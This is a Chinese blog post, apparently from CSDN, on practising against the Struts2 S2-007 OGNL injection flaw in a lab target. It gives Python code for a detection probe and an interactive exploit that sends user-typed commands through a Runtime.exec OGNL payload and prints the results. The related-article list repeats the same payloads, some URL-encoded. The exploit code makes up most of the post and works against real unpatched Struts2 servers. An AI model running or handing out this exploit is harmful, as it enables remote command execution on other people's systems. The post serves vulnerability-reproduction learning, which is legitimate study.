s2-007远程执行漏洞靶机练写poc和exp

最新推荐文章于 2022-12-21 15:42:12 发布
最新推荐文章于 2022-12-21 15:42:12 发布
阅读量298 收藏 1
点赞数 1
文章标签: python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rlenew/article/details/110739960
版权

漏洞原理

当用户提交 age 为字符串而非整形数值时,后端用代码拼接 “’” + value + “’” 然后对其进行 OGNL
表达式解析。要成功利用,只需要找到一个配置了类似验证规则的表单字段使之转换出错,借助类似 SQLi 注入单引号拼接的方式即可注入任意OGNL 表达式。
影响版本:Struts2 2.0.0 - Struts2 2.2.3

漏洞的利用过程网上有很多文章,在实验环境下。试图尽量接近实验环境进行编写poc,因此在这次的poc编写的时候,是利用BeautifulSoup获取input标签中的value的值赋值给data,再进行post。

def s2_007(url):
    # 影响版本: 2.0.0 - 2.2.3
    data = {
        list[0]: '1',
        list[1]: '1',
        list[2]: '\'+(1+1)+\''
    }
    s1 = requests.post(url=url, data=data, headers=headers)
    page = BeautifulSoup(s1.text, 'lxml')
    find_key = page.find_all("input")
    for i in find_key:
        if '11' in i.attrs['value']:
            print("存在s2-007漏洞")
            s2_007exp(url)
        else:
            pass

而exp则是直接调用执行命令的语句,但是这里的单引号和双引号的问题很困恼,因此利用外写添加进去。

def s2_007exp(url):
    while True:
        exec = input("exec:")
        payload = '\' + (#_memberAccess["allowStaticMethodAccess"]=true,'
        payload += '#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,'
        payload += '@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(\'{}'.format(exec)
        payload += '\').getInputStream())) + \''
        data = {
            list[0]: '1',
            list[1]: '1',
            list[2]: payload
        }
        s = requests.post(url=url, data=data, headers=headers)
        page1 = BeautifulSoup(s.text, 'lxml')
        find_key1 = page1.find_all("input")
        print(find_key1[2]['value'])

自动化获取value的值代码为:

list = []
    s = requests.post(url=url, headers=headers)
    soup = BeautifulSoup(s.text, 'lxml')
    vule1 = soup.find_all("input")
    for i in vule1:
        if not i.attrs['value']:
            a = i.attrs['name']
            list.append(a)
        else:
            pass

完整代码放在了https://github.com/cve-2020/jiaoben

0x 0101
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-007(CVE-2012-0838)
qq_51577576的博客
10-13 1415
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-007(CVE-2012-0838) S2-007S2-003、S2-005的漏洞源头都是一样的,都是struts2对OGNL的解析过程中存在漏洞 当用户提交 age 为字符串而非整形数值时,后端用代码拼接 "'" + value + "'" 然后对其进行 OGNL 表达式解析。要成功利用,只需要找到一个配置了类似验证规则的表单字段使之转换出错,借助类似 SQLi 注入单引号拼接的方式即可注入任意 OGNL 表达式
S2-007 远程代码执行漏洞
EC_Carrot的博客
08-07 612
漏洞简介 影响版本: 2.0.0 - 2.2.3 漏洞详细还是移步到这篇文章 漏洞复现 将exp传入可利用的age输入框里即可运行命令: ' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(
s2-007远程代码执行漏洞
yc11223344的博客
05-06 484
age来自于用户输入,传递一个非整数给id导致错误,struts会将用户的输入当作ongl表达式执行,从而导致了漏洞。 在本地启动环境:虚拟机ip:8080 由于这个漏洞是在发生在age属性,所以直接对age进行payload执行,也可以在name和email进行测试,但是没有用。 执行whoami命令 ' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["x.
【vulhub】s2-007远程代码执行漏洞
热门推荐
qq_45300786的博客
07-08 1万+
poc %27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew+java.lang.Boolean%28%22false%22%29+%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString%28%40java.l
0x21.Apache Struts2远程代码执行漏洞(S2-007)复现
qq_31679787的博客
10-16 6063
s2-007:当配置了验证规则,类型转换出错时,进行了错误的字符串拼接,进而造成了OGNL语句的执行; 抓包,在age值处输入pocpoc:'+(#application)+' 判断出在age输入框存在s2-007漏洞; 输入poc查找key文件位置,得到key值; poc:%27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%...
行业文档-设计装置-自动换靶机和连体靶纸.zip
08-21
《自动换靶机和连体靶纸》是一个深入探讨工业自动化设计的专业文档,主要涵盖了自动换靶机与连体靶纸技术的相关知识。在当前制造业向着智能化、高效化发展的趋势下,这类设备的设计与应用成为了提升生产效率和产品...
exploit.tar(DC3靶机所需提权exp-1)
02-20
39772.zip
crasher.tar(DC3靶机所需提权exp-2)
02-20
DC3靶机所需提权exp
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Struts S2-007复现
ZJT6666666的博客
12-21 386
Struts S2-007复现
struts2 CVE-2012-0838 S2-007 Remote Code Execution && Hotfix
weixin_34406796的博客
07-12 177
catalog 1. Description 2. Effected Scope 3. Exploit Analysis 4. Principle Of Vulnerability 5. Patch Fix   1. Description S2-007S2-003、S2-005的漏洞源头都是一样的,都是struts2对OGNL的解析过程中存在漏洞,导致黑客可以通过OGN...
S2-007 远程代码执行漏洞检测与利用
Fly_鹏程万里
12-14 1344
漏洞原理 如下age来自于用户输入,传递一个非整数给id导致错误,struts会将用户的输入当作ongl表达式执行,从而导致了漏洞POC a.获取tomcat执行路径: %{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"} b、获取web路径 %{ #req=@org.apache.struts2...
Struts2 漏洞复现之s2-007
weixin_51220765的博客
12-14 1080
Struts2 漏洞复现之s2-007 原理: age来自于用户输入,传递一个非整数给id导致错误,struts会将用户的输入当作ongl表达式执行,从而导致了漏洞 1.到007下 cd vulhub-master/struts2/s2-007 2.启动007 docker-compose up -d 3.访问靶机ip:8080 注意:如果此时报404错误,不要慌哦~ 我们去浏览器的历史记录里清除一下缓存,然后刷新一下页面就好了!具体步骤如下: 当页面回复正常后,我们就可以继续进行咯~ 3
【研究】Struts2漏洞S2-008漏洞环境和可用回显POC
god_Zeo的安全博客
07-01 3171
【研究】Struts2漏洞S2-008漏洞环境和可用POC1.环境2.原理3.影响版本4.利用过程POC有效POC’’POC注意 1.环境 环境 https://github.com/vulhub/vulhub/blob/master/README.zh-cn.md 这个搭环境很方便快捷,具体可以看说明,很简单 2.原理 参考 http://rickgray.me/2016/05/06/revi...
CTF-Apache Struts2远程代码执行漏洞(S2-007)复现
asd158923328的博客
08-21 424
根据题意 形成原因:当配置了验证规则,类型转换出错时,进行了错误的字符串拼接,进而造成了OGNL语句的执行。 进入环境,查看源码, 限制了三个输入框的的值只能为text,而且长度在540以上, 然后在登录界面用户名和邮箱值随意,age部分改为我们的payload ’ + (#_memberAccess[“allowStaticMethodAccess”]=true,#foo=new java...
Apache Struts2远程代码执行漏洞(S2-007)复现
qq_42283440的博客
09-05 6685
经百度得知S-007漏洞原理,年龄框改为payload,在age的value部分进行命令执行 %27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew+java.lang.Boolean%28%22false%22%29+%2C%23context%5B%22xwork.MethodAc...
[旧文系列] Struts2历史高危漏洞系列-part2:S2-007/S2-008/S2-009
mole_exp的博客
01-18 1962
文章目录关于<旧文系列>前言S2-007漏洞复现与分析可回显PoC漏洞修复S2-008漏洞复现与分析Vuln-1:Remote command execution in CookieInterceptorVuln-2:Remote command execution in DebuggingInterceptorVuln-2:可回显PoC漏洞修复S2-009漏洞复现与分析可回显PoC漏洞修复Reference 关于<旧文系列> <旧文系列>系列是笔者将以前发到其他地方的技
如何使用metasploit利用ms17-010漏洞对模拟靶机进行攻击
最新发布
06-09
MS17-010漏洞是指Windows SMB远程代码执行漏洞,可以通过Metasploit利用这个漏洞对目标系统进行攻击。下面是攻击步骤: 1. 打开Metasploit控制台,输入`msfconsole`命令启动。 2. 搜索MS17-010漏洞模块,输入命令`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值